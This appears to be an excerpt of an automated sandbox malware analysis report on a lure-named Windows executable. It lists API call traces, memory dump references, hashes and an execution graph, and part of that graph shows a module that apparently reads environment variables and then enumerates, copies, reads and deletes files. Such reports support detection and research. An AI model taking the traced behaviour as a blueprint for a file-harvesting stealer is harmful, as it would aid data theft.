                                                      • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: : Completed
                                                      • API String ID: 3677997916-2954849223
                                                      • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                      • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                      • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                      • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-4083868402
                                                      • Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                      • Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
                                                      • Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                      • Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00402D9D
                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                      • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00402DE6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                      • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                      • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                      • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                      APIs
                                                      • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: TextWindow
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$1033
                                                      • API String ID: 530164218-3227888777
                                                      • Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                      • Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
                                                      • Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                      • Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0040511C
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                      • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                      • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                      • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                      • GlobalFree.KERNEL32(?), ref: 004037EF
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 1100898210-4083868402
                                                      • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                      • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                                      • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                      • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405A20
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405A30
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-1876063424
                                                      • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                      • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                                      • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                      • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                      • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                      • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                      • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                      • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9

                                                      Execution Graph

                                                      Execution Coverage:1.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0.5%
                                                      Total number of Nodes:214
                                                      Total number of Limit Nodes:5
                                                      execution_graph 8895 1f231c5b 8896 1f231c6b ___scrt_fastfail 8895->8896 8899 1f2312ee 8896->8899 8898 1f231c87 8900 1f231324 ___scrt_fastfail 8899->8900 8901 1f2313b7 GetEnvironmentVariableW 8900->8901 8925 1f2310f1 8901->8925 8904 1f2310f1 57 API calls 8905 1f231465 8904->8905 8906 1f2310f1 57 API calls 8905->8906 8907 1f231479 8906->8907 8908 1f2310f1 57 API calls 8907->8908 8909 1f23148d 8908->8909 8910 1f2310f1 57 API calls 8909->8910 8911 1f2314a1 8910->8911 8912 1f2310f1 57 API calls 8911->8912 8913 1f2314b5 lstrlenW 8912->8913 8914 1f2314d2 8913->8914 8915 1f2314d9 lstrlenW 8913->8915 8914->8898 8916 1f2310f1 57 API calls 8915->8916 8917 1f231501 lstrlenW lstrcatW 8916->8917 8918 1f2310f1 57 API calls 8917->8918 8919 1f231539 lstrlenW lstrcatW 8918->8919 8920 1f2310f1 57 API calls 8919->8920 8921 1f23156b lstrlenW lstrcatW 8920->8921 8922 1f2310f1 57 API calls 8921->8922 8923 1f23159d lstrlenW lstrcatW 8922->8923 8924 1f2310f1 57 API calls 8923->8924 8924->8914 8926 1f231118 ___scrt_fastfail 8925->8926 8927 1f231129 lstrlenW 8926->8927 8938 1f232c40 8927->8938 8930 1f231177 lstrlenW FindFirstFileW 8932 1f2311e1 8930->8932 8933 1f2311a0 8930->8933 8931 1f231168 lstrlenW 8931->8930 8932->8904 8934 1f2311c7 FindNextFileW 8933->8934 8935 1f2311aa 8933->8935 8934->8933 8937 1f2311da FindClose 8934->8937 8935->8934 8940 1f231000 8935->8940 8937->8932 8939 1f231148 lstrcatW lstrlenW 8938->8939 8939->8930 8939->8931 8941 1f231022 ___scrt_fastfail 8940->8941 8942 1f2310af 8941->8942 8943 1f23102f lstrcatW lstrlenW 8941->8943 8944 1f2310b5 lstrlenW 8942->8944 8955 1f2310ad 8942->8955 8945 1f23106b lstrlenW 8943->8945 8946 1f23105a lstrlenW 8943->8946 8971 1f231e16 8944->8971 8957 1f231e89 lstrlenW 8945->8957 8946->8945 8949 1f2310ca 8952 1f231e89 5 API calls 8949->8952 8949->8955 8950 1f231088 GetFileAttributesW 8951 1f23109c 8950->8951 8950->8955 8951->8955 8963 1f23173a 8951->8963 8954 1f2310df 8952->8954 8976 1f2311ea 8954->8976 8955->8935 8958 1f232c40 ___scrt_fastfail 8957->8958 8959 1f231ea7 lstrcatW lstrlenW 8958->8959 8960 1f231ec2 8959->8960 8961 1f231ed1 lstrcatW 8959->8961 8960->8961 8962 1f231ec7 lstrlenW 8960->8962 8961->8950 8962->8961 8964 1f231747 ___scrt_fastfail 8963->8964 8991 1f231cca 8964->8991 8967 1f23199f 8967->8955 8969 1f231824 ___scrt_fastfail _strlen 8969->8967 9011 1f2315da 8969->9011 8972 1f231e29 8971->8972 8975 1f231e4c 8971->8975 8973 1f231e2d lstrlenW 8972->8973 8972->8975 8974 1f231e3f lstrlenW 8973->8974 8973->8975 8974->8975 8975->8949 8977 1f23120e ___scrt_fastfail 8976->8977 8978 1f231e89 5 API calls 8977->8978 8979 1f231220 GetFileAttributesW 8978->8979 8980 1f231246 8979->8980 8981 1f231235 8979->8981 8982 1f231e89 5 API calls 8980->8982 8981->8980 8983 1f23173a 35 API calls 8981->8983 8984 1f231258 8982->8984 8983->8980 8985 1f2310f1 56 API calls 8984->8985 8986 1f23126d 8985->8986 8987 1f231e89 5 API calls 8986->8987 8988 1f23127f ___scrt_fastfail 8987->8988 8989 1f2310f1 56 API calls 8988->8989 8990 1f2312e6 8989->8990 8990->8955 8992 1f231cf1 ___scrt_fastfail 8991->8992 8993 1f231d0f CopyFileW CreateFileW 8992->8993 8994 1f231d55 GetFileSize 8993->8994 8995 1f231d44 DeleteFileW 8993->8995 8996 1f231ede 22 API calls 8994->8996 9000 1f231808 8995->9000 8997 1f231d66 ReadFile 8996->8997 8998 1f231d94 CloseHandle DeleteFileW 8997->8998 8999 1f231d7d CloseHandle DeleteFileW 8997->8999 8998->9000 8999->9000 9000->8967 9001 1f231ede 9000->9001 9003 1f23222f 9001->9003 9004 1f23224e 9003->9004 9007 1f232250 9003->9007 9019 1f23474f 9003->9019 9024 1f2347e5 9003->9024 9004->8969 9006 1f232908 9008 1f2335d2 __CxxThrowException@8 RaiseException 9006->9008 9007->9006 9031 1f2335d2 9007->9031 9010 1f232925 9008->9010 9010->8969 9012 1f23160c _strcat _strlen 9011->9012 9013 1f23163c lstrlenW 9012->9013 9119 1f231c9d 9013->9119 9015 1f231655 lstrcatW lstrlenW 9016 1f231678 9015->9016 9017 1f231693 ___scrt_fastfail 9016->9017 9018 1f23167e lstrcatW 9016->9018 9017->8969 9018->9017 9034 1f234793 9019->9034 9021 1f234765 9040 1f232ada 9021->9040 9023 1f23478f 9023->9003 9029 1f2356d0 _abort 9024->9029 9025 1f23570e 9053 1f236368 9025->9053 9027 1f2356f9 RtlAllocateHeap 9028 1f23570c 9027->9028 9027->9029 9028->9003 9029->9025 9029->9027 9030 1f23474f _abort 7 API calls 9029->9030 9030->9029 9032 1f2335f2 RaiseException 9031->9032 9032->9006 9035 1f23479f ___scrt_is_nonwritable_in_current_image 9034->9035 9047 1f235671 RtlEnterCriticalSection 9035->9047 9037 1f2347aa 9048 1f2347dc 9037->9048 9039 1f2347d1 _abort 9039->9021 9041 1f232ae3 9040->9041 9042 1f232ae5 IsProcessorFeaturePresent 9040->9042 9041->9023 9044 1f232b58 9042->9044 9052 1f232b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9044->9052 9046 1f232c3b 9046->9023 9047->9037 9051 1f2356b9 RtlLeaveCriticalSection 9048->9051 9050 1f2347e3 9050->9039 9051->9050 9052->9046 9056 1f235b7a GetLastError 9053->9056 9057 1f235b93 9056->9057 9058 1f235b99 9056->9058 9075 1f235e08 9057->9075 9062 1f235bf0 SetLastError 9058->9062 9082 1f23637b 9058->9082 9063 1f235bf9 9062->9063 9063->9028 9067 1f235bb9 9070 1f235be7 SetLastError 9067->9070 9068 1f235bcf 9102 1f23593c 9068->9102 9069 1f235bb3 9089 1f23571e 9069->9089 9070->9063 9073 1f23571e _free 17 API calls 9074 1f235be0 9073->9074 9074->9062 9074->9070 9107 1f235c45 9075->9107 9077 1f235e2f 9078 1f235e47 TlsGetValue 9077->9078 9079 1f235e3b 9077->9079 9078->9079 9080 1f232ada _ValidateLocalCookies 5 API calls 9079->9080 9081 1f235e58 9080->9081 9081->9058 9087 1f236388 _abort 9082->9087 9083 1f2363c8 9086 1f236368 __dosmaperr 19 API calls 9083->9086 9084 1f2363b3 RtlAllocateHeap 9085 1f235bab 9084->9085 9084->9087 9085->9069 9095 1f235e5e 9085->9095 9086->9085 9087->9083 9087->9084 9088 1f23474f _abort 7 API calls 9087->9088 9088->9087 9090 1f235729 HeapFree 9089->9090 9094 1f235752 __dosmaperr 9089->9094 9091 1f23573e 9090->9091 9090->9094 9092 1f236368 __dosmaperr 18 API calls 9091->9092 9093 1f235744 GetLastError 9092->9093 9093->9094 9094->9067 9096 1f235c45 _abort 5 API calls 9095->9096 9097 1f235e85 9096->9097 9098 1f235ea0 TlsSetValue 9097->9098 9099 1f235e94 9097->9099 9098->9099 9100 1f232ada _ValidateLocalCookies 5 API calls 9099->9100 9101 1f235bc8 9100->9101 9101->9068 9101->9069 9113 1f235914 9102->9113 9110 1f235c71 9107->9110 9112 1f235c75 __crt_fast_encode_pointer 9107->9112 9108 1f235c95 9111 1f235ca1 GetProcAddress 9108->9111 9108->9112 9109 1f235ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 9109->9110 9110->9108 9110->9109 9110->9112 9111->9112 9112->9077 9114 1f235854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 9113->9114 9115 1f235938 9114->9115 9116 1f2358c4 9115->9116 9117 1f235758 _abort 20 API calls 9116->9117 9118 1f2358e8 9117->9118 9118->9073 9120 1f231ca6 _strlen 9119->9120 9120->9015 8863 1f23c7a7 8864 1f23c7be 8863->8864 8873 1f23c82c 8863->8873 8864->8873 8875 1f23c7e6 GetModuleHandleA 8864->8875 8865 1f23c872 8866 1f23c835 GetModuleHandleA 8869 1f23c83f 8866->8869 8868 1f23c7dd 8868->8869 8871 1f23c800 GetProcAddress 8868->8871 8868->8873 8870 1f23c85f GetProcAddress 8869->8870 8869->8873 8870->8873 8872 1f23c80d VirtualProtect 8871->8872 8871->8873 8872->8873 8874 1f23c81c VirtualProtect 8872->8874 8873->8865 8873->8866 8873->8869 8874->8873 8876 1f23c7ef 8875->8876 8884 1f23c82c 8875->8884 8887 1f23c803 GetProcAddress 8876->8887 8878 1f23c872 8879 1f23c835 GetModuleHandleA 8883 1f23c83f 8879->8883 8880 1f23c7f4 8881 1f23c800 GetProcAddress 8880->8881 8880->8884 8882 1f23c80d VirtualProtect 8881->8882 8881->8884 8882->8884 8885 1f23c81c VirtualProtect 8882->8885 8883->8884 8886 1f23c85f GetProcAddress 8883->8886 8884->8878 8884->8879 8884->8883 8885->8884 8886->8884 8888 1f23c82c 8887->8888 8889 1f23c80d VirtualProtect 8887->8889 8891 1f23c872 8888->8891 8892 1f23c835 GetModuleHandleA 8888->8892 8889->8888 8890 1f23c81c VirtualProtect 8889->8890 8890->8888 8894 1f23c83f 8892->8894 8893 1f23c85f GetProcAddress 8893->8894 8894->8888 8894->8893

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1F231137
                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F231151
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F23115C
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F23116D
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F23117C
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F231193
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 1F2311D0
                                                      • FindClose.KERNEL32(00000000), ref: 1F2311DB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
